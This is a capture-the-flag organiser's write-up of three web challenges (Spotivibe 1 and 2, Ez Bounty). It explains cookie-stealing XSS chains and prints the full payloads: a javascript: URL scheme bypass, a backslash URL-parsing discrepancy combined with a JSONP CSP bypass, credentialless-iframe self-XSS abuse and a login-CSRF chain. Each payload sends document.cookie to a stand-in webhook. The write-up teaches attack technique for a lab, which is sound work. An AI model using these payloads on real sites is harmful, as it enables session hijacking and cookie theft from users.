Last week, I had the opportunity to organize, together with the other K!nd4SUS members, the second edition of the K!nd4SUS CTF, where I contributed by creating three Web challenges: Spotivibe 1, Spotivibe 2, and Ez Bounty.

Below you can find the writeups for these challenges.

SpotiVibe 1


The application allows users to create custom song pages by embedding Spotify tracks.

There is also a feature that allows a user to report a song to an admin bot. The bot visits the reported page and its cookie contains the flag which immediately suggests that the challenge is XSS-related.

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "path": "/",
    "httpOnly": False
})
threading.Thread(target=run_bot, args=(song_id,)).start()

The vulnerable page is generated using user input when creating a song. The relevant part is the <iframe> that loads the provided Spotify URL:

<iframe 
    src="{{ song.spotify_url}}"
    width="400"
    height="380"
    frameborder="0"
    allowtransparency="true"
    allow="encrypted-media">
</iframe>

The application performs validation on the URL, requiring:

if parsed.hostname != "open.spotify.com":
    return False

if not parsed.path.startswith("/embed/"):
    return False

if '"' in decoded:
    return False

At first glance, the validation seems reasonably secure, as it enforces both the hostname and the path of the provided URL. However, it completely lacks any control over the URL scheme (protocol), which makes it possible to bypass these checks.

In particular, this allows us to use the javascript: protocol instead of a standard https:// URL. When parsing a payload such as javascript://open.spotify.com/embed/..., Python’s urlparse interprets javascript as the scheme, open.spotify.com as the hostname, and /embed/... as the path.

The final payload used to solve the challenge is:

javascript://open.spotify.com/embed/%0afetch('https://webhook/?c='+document.cookie)

Here, // starts a JavaScript comment, effectively ignoring open.spotify.com/embed/, while the newline (%0a) breaks the comment and allows the malicious code to execute.

SpotiVibe 2


In this second version of the challenge, an additional validation has been introduced to mitigate the previous vulnerability.

In particular, the application now enforces that the scheme must be either http or https:

if parsed.scheme not in ["http", "https"]:
    return False

This prevents the use of the javascript: protocol, making the previous exploit no longer viable.

As in the previous challenge, the flag is stored inside a cookie of the admin bot:

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "path": "/",
    "httpOnly": False
})

A new feature has also been introduced: a search functionality on the /dashboard page. The search parameter is directly rendered using the | safe filter:

<p>Results for: <strong>{{ search | safe }}</strong></p>

This introduces a clear XSS vulnerability on the search parameter.

However, this injection point alone is not sufficient due to the presence of a Content Security Policy (CSP), which blocks inline scripts and only allows scripts with a valid nonce or from specific trusted sources:

script-src 'self' 'nonce-...' https://www.w3schools.com;

To exploit the vulnerability, it is necessary to chain multiple issues together.

First, we bypass the URL validation by exploiting a discrepancy between how Python’s urlparse (which follows RFC 3986) and modern browsers (which follow the WHATWG URL Standard) interpret URLs.

According to RFC 3986, the \ character has no special meaning and is treated as a normal character. Therefore, when parsing a URL such as:

http://chall.k1nd4sus.it:30503\@open.spotify.com/embed/../../dashboard?search=

Python interprets it as:

The @ symbol plays a crucial role here: in URLs, it separates the optional userinfo (username:password) from the hostname. Everything before @ is treated as user-controlled metadata, while everything after it is considered the actual host.

Because of this, the validation logic sees open.spotify.com as the hostname and accepts the URL.

However, browsers follow the WHATWG URL Standard, which normalizes backslashes (\) into forward slashes (/) before parsing. As a result, the same URL is interpreted by the browser as:

http://chall.k1nd4sus.it:30503/@open.spotify.com/embed/../../dashboard?search=

Now the hostname becomes chall.k1nd4sus.it, and @open.spotify.com is treated as part of the path rather than userinfo.

Finally, the ../../ sequence performs a path traversal, allowing navigation from /embed/ to /dashboard, where the XSS vulnerability is located.

At this point, we control the search parameter, but CSP still prevents direct execution of inline JavaScript.

However, the CSP explicitly allows scripts from https://www.w3schools.com. This can be abused using a JSONP endpoint.

JSONP (JSON with Padding) is a legacy technique where the server returns JavaScript instead of plain JSON, wrapping the response inside a user-controlled callback function. Since the callback is directly executed by the browser, controlling it allows arbitrary JavaScript execution.

The endpoint https://www.w3schools.com/js/demo_jsonp2.php reflects the callback parameter without sanitization, making it usable for a CSP bypass.

The final exploit is the following

http://chall.k1nd4sus.it:30503\@open.spotify.com/embed/../../dashboard?search=<script+src='https://www.w3schools.com/js/demo_jsonp2.php?callback=setTimeout(function(){new Image().src='WEBHOOK_URL?d='+document.cookie},0)'></script>

Ez Bounty


The goal of this challenge is to steal the flag stored inside the admin bot’s cookie.

The application exposes a /report endpoint that allows us to make the admin bot visit an arbitrary URL.

await page.setCookie({
    "name": "flag",
    "value": FLAG,
    "httpOnly": False,
    "sameSite": "None",
    "secure": True
})

Additionally, the dashboard renders the username using the | safe filter:

<h1>Welcome <span class="username">{{ username | safe }}</span></h1>

This introduces a stored self-XSS, since the payload is only executed when the user is logged into their own account.

Intended Solution — Credentialless iframe abuse

At first glance, the self-XSS seems useless, since triggering it would require the bot to log into our account, losing access to the admin session and its cookie.

However, this limitation can be bypassed using credentialless iframes.

A credentialless iframe loads a page without sending cookies, creating a fresh session. At the same time, it still shares the same origin with other frames, allowing interaction via window.top.

To make the payload cleaner, instead of placing all the JavaScript inside the username, we use the following payload:

<img src=x onerror=eval(window.name)>

This allows us to store the actual JavaScript inside the iframe name attribute and execute it via eval(window.name).

When the XSS triggers, the injected script:

The final exploit page is:

<div style="display:flex; gap:20px;">

  <iframe
    name="
let i = setInterval(() => {
  try {
    for (let j = 0; j < window.top.frames.length; j++) {
      let f = window.top.frames[j];
      try {
        if (f.location.href.includes('dashboard')) {
          if (f.document && f.document.body && f.document.readyState === 'complete') {
            new Image().src =
              'https://WEBHOOK_URL?c=' +
              encodeURIComponent(f.document.cookie);
            clearInterval(i);
          }
        }
      } catch(e) {}
    }
  } catch(e) {}
}, 500);
"
    width="40%"
    height="500"
    credentialless>
  </iframe>

  <script>
document.querySelector("iframe").srcdoc = `
<form action="https://chall.k1nd4sus.it:30510/login" method="POST">
  <input name="username" value="<img src=x onerror=eval(window.name)>" />
  <input name="password" value="PASSWORD" />
</form>
<script>document.forms[0].submit();<\/script>
`;
</script>

  <iframe
    src="https://chall.k1nd4sus.it:30510/dashboard"
    width="40%"
    height="500">
  </iframe>

</div>

For a more in-depth explanation of this technique, see: https://blog.slonser.info/posts/make-self-xss-great-again/

Unintended Solution

An unintended solution consists of chaining the self-XSS with a lack of CSRF protection on the authentication endpoints.

The idea is to force the bot to log into our malicious account instead of the admin one.

This is possible because both /login and /logout do not implement CSRF protections.

We register a user with a malicious username such as:

<script>fetch('https://WEBHOOK_URL?c='+document.cookie)</script>

Then we host a page that:

<form method="POST" action="https://chall.k1nd4sus.it:30510/login">
  <input name="username" value="&lt;script&gt;fetch('https://WEBHOOK_URL?c='+document.cookie)&lt;/script&gt;">
  <input name="password" value="password">
</form>

<script>
fetch("https://chall.k1nd4sus.it:30510/logout", {
  credentials: "include",
  mode: "no-cors"
}).then(() => document.forms[0].submit());
</script>

When the bot visits this page:

This works because session.clear() only removes the server-side session data and the associated session cookie, but it does not affect other cookies set in the browser.

In particular, the flag is stored in a separate cookie that is manually set by the bot using page.setCookie(). This cookie is not tied to the Flask session and is therefore not removed during the logout process.

As a result, even after the forced logout and subsequent login into our account, the flag cookie is still present in the browser.